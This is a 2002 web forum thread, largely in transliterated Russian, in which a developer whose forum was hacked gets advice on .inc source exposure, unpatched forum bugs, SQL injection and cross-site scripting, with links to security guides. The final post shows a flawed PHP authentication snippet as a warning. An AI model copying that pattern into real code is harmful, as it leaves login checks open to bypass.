|
24.10.2002, 13:32
| #1 |
| Web developer  Join Date: 09 2002 Location: Yerevan Age: 40
Posts: 896
Downloads: 1 Uploads: 0
Reputation: 9 | 0 |  Menya vzlomali :( |
 |
|
24.10.2002, 14:52
| #2 | |
| Магистр Join Date: 02 2002 Location: Am
Posts: 952
Downloads: 0 Uploads: 0
Reputation: 26 | 4 | Quote:
 bajc meka LooL )moj expo 3-4 -re raza podrat odin i tot je mudak lomal.. prosto s idiotami svyazivatca ne oxota a to spokojno mog iz Arminco IP vzyat i p**j ponaveshat'.. tak 4to prosto vostanovi starij variant i pomenyaj paroli.. | |
| |
|
24.10.2002, 16:32
| #3 |
| ¡no pasaran!  Join Date: 03 2002 Location: localhost Age: 39
Posts: 540
Downloads: 0 Uploads: 0
Reputation: 13 | 4 | 
IIS  |
| |
|
24.10.2002, 18:31
| #4 |
| Web developer Join Date: 09 2002 Location: Yerevan Age: 40
Posts: 896
Downloads: 1 Uploads: 0
Reputation: 9 | 0 |
2 Arik: Eto prosto oznachaet to chto gotovye produkty prosto ispol'zovat' nel'zya, vse nado samomu pisat'... 2 DolphiN: IIS, kak i Apache, kak i drugie Web server-y trebuyut xoroshey nastroyki. U vsex est' svoi minus-y i plus-y, i vsex ix mozhno vzlomat'. V etom sluchae ya nichego sdelat' ne mogu, t.k. hosting to ne moy. Da i kstati, prichem tut IIS, kogda kak slomali lish' forum??? |
| |
|
24.10.2002, 19:54
| #5 |
| Магистр Join Date: 02 2002 Location: Am
Posts: 952
Downloads: 0 Uploads: 0
Reputation: 26 | 4 |
2 Aram Ghazanchyan Polnostyu soglasen.. |
| |
|
25.10.2002, 00:29
| #6 |
| Главный Лысый  Join Date: 10 2001 Location: AM Age: 43
Posts: 2,829
Downloads: 4 Uploads: 0
Reputation: 28 | 4 |
Arik, zachastuyu delo ne v parolyakh i nastroykakh web-servera. Samiy prostoy primer - esli u tebya v prilozhenii khranitsya chast' code-a v .inc file-akh, a na web-servere ne nastroen zapret na vydachu etikh file-ov bez parsing-a, to lyuboy mozhet zaprosit URL s etim file-om, i uvidet' ego source. BTW na armincovskom hosting-e imenno takaya situaciya..... I nebol'shoy IMHO. Esli vzlomali - to snachala nado viyasnit' kak eto sdelali, i tol'ko potom vosstanavlivat'sya iz backup-ov. Regards
__________________ Ruben Muradyan Technical Director PanARMENIAN Network: Armenian News ---------------------------------------------------- Лысина - это полянка, вытоптанная мыслями. ---------------------------------------------------- |
| |
|
25.10.2002, 00:47
| #7 |
| Главный Лысый Join Date: 10 2001 Location: AM Age: 43
Posts: 2,829
Downloads: 4 Uploads: 0
Reputation: 28 | 4 | Eto prosto oznachaet to chto gotovye produkty prosto ispol'zovat' nel'zya, vse nado samomu pisat'... Zdes' est' neskol'ko nuansov. 1. Ya s etim utverzhdeniem polnostyu soglasen, pravda ne iz soobrazheniy bezopasnosti...... 2. Pisat' nado ochen' vnimatel'no. Prichem Nastoyatel'no rekomenduyu imet' v comande gramotnogo sysadmina. Delo v tom, chto bol'shinstvo oshibok viyavlyayutsya na urovne proverki sootvetstviya standartam. V kachestve prostogo primera. Na odnom Web - server-e vse files .html parsyatsya s pomoshyu php vne zavisimosti est' v etom file-e php cod ili net. S odnoy storony udobno. S drugoy storony ne peredaetsya header "Last-Modified" I generiruetsya namnogo bol'she traffic-a..... 3. Esli comanda bol'shaya nado imet' khotya by odnogo chela, osushestvlyayushego security audit code-a.... 4. Vnimatel'no chitat' whitepapers. Ogromnoe kol-vo site-ov podverzheno Oshibkam tipa Cros-Site Scripting. 5. Esli administrator servera chelovek nedostupniy(hosting), to vnimatel'no izuchit' configuratsiyu servera i pisat' v sootvetstvii s etim. V sluchae s arminco - ne khranit' kuski code-a v .inc file-ak, a pereimenovat' ikh v .php. 6. podpisat'sya na sootvetstvuyushie mailing listy. Potomu chto periodicheski voznikayut novie uyazvimosti...... Vot vrode i vse |
| |
|
25.10.2002, 13:49
| #8 |
| Web developer Join Date: 09 2002 Location: Yerevan Age: 40
Posts: 896
Downloads: 1 Uploads: 0
Reputation: 9 | 0 |
2 Pascal: Thanks za podrobnuyu informaciyu. Ya dumayu chto vse configure file-y, nuzhno xranit' v *.inc.php(asp) file-ax. Ne mo by ty rasskazat' chto takoe "Cros-Site Scripting"? |
| |
|
25.10.2002, 17:56
| #9 |
| Магистр Join Date: 02 2002 Location: Am
Posts: 952
Downloads: 0 Uploads: 0
Reputation: 26 | 4 |
immeno.. 4to takoe : "Cros-Site Scripting" |
| |
|
25.10.2002, 21:59
| #10 |
| Главный Лысый Join Date: 10 2001 Location: AM Age: 43
Posts: 2,829
Downloads: 4 Uploads: 0
Reputation: 28 | 4 | "What is Cross Site Scripting?" Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, web board, email, or from an instant message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Nebol'shoe obyasnenie XSS oshibok sdelannykh programmerom web-prilozheniy nakhoditsya zdes' http://www.cert.org/archive/pdf/cros..._scripting.pdf A vot opisanie oshibok etogo tipa dopushennoy razrabotchikami servera http://www.kb.cert.org/vuls/id/520707 http://www.cgisecurity.com/archive/w...2.0.43-xss.txt Vot tut guide po napisaniyu bezopasnykh web-prilozheniy. IMHO etu vesh nado raspechatat' i chitat' kak Bibliyu http://online.securityfocus.com/data...vices-V1.0.pdf A voobshe http://www.cgisecurity.com/ Regards |
| |
|
26.10.2002, 03:33
| #11 |
| Профессор Join Date: 01 2002 Location: New York, USA
Posts: 2,938
Downloads: 0 Uploads: 0
Reputation: 0 | 0 |
Ghazanchyan, a pochemu ty vovremya bug fixes ne delal????? etomu bug-u, kotorye ispol'zuyut stambulskie shenki, uzhe mesyaca 4 kak minimum. prochitay na snitz forume i smeni potom parol'... 2 Arik tebya lomali 3 raza, i ty dazhe ne interesuyeshsya pochemu?????? |
| |
|
26.10.2002, 03:34
| #12 |
| Профессор Join Date: 01 2002 Location: New York, USA
Posts: 2,938
Downloads: 0 Uploads: 0
Reputation: 0 | 0 |
2 Pascal es urish bug a, u kapvaca sql inject-i het.... |
| |
|
26.10.2002, 03:43
| #13 |
| Главный Лысый Join Date: 10 2001 Location: AM Age: 43
Posts: 2,829
Downloads: 4 Uploads: 0
Reputation: 28 | 4 |
groul Ya privel primer.... Delo v tom, chto ochen' malo web-developerov prinimayut mery po obespecheniyu bezopasnosti svoikh site-ov.... XSS - eto klassika nevnimatel'nogo programmera..... |
| |
|
26.10.2002, 03:52
| #14 |
| Профессор Join Date: 01 2002 Location: New York, USA
Posts: 2,938
Downloads: 0 Uploads: 0
Reputation: 0 | 0 |
sql inject - tozhe )))vsego to nado vnimatel'no server side validation delat'... kstati ya kak-to god nazad pisal user authentication system i stal smotret' raznye statyu na web. Iz 7-i prochitannyx statej, v 5-i ne bylo ni slova o validation (a ved' te kto pisali statyi, vrode by uzhe opytnye programmery) Chto eto znachit? Eto znachit, chto real'no 60% site-ov srednego urovnya mozhno "polozhit'" tol'ko za schet necorrectnogo osushestvleniya mexanizma validation...
__________________ Karen Vrtanesyan, աջակցող ArmenianHouse.org - Armenian Library and Forum. Literary Cafe - Young Armenian writers and poets |
| |
|
26.10.2002, 05:08
| #15 |
| Консервативн  Join Date: 01 2002 Location: Кавказская Албания
Posts: 889
Downloads: 0 Uploads: 0
Reputation: 0 | 0 |
My 2c Eshe odna dowlo'no populyarnaya oshibka authenication-a, Code: if($login == "admin" &&$pass == "mypass")
$auth = 1;
..
...
..
if ($auth){
/* ADMIN STAFF */
} |
| |
| Sponsored Links |
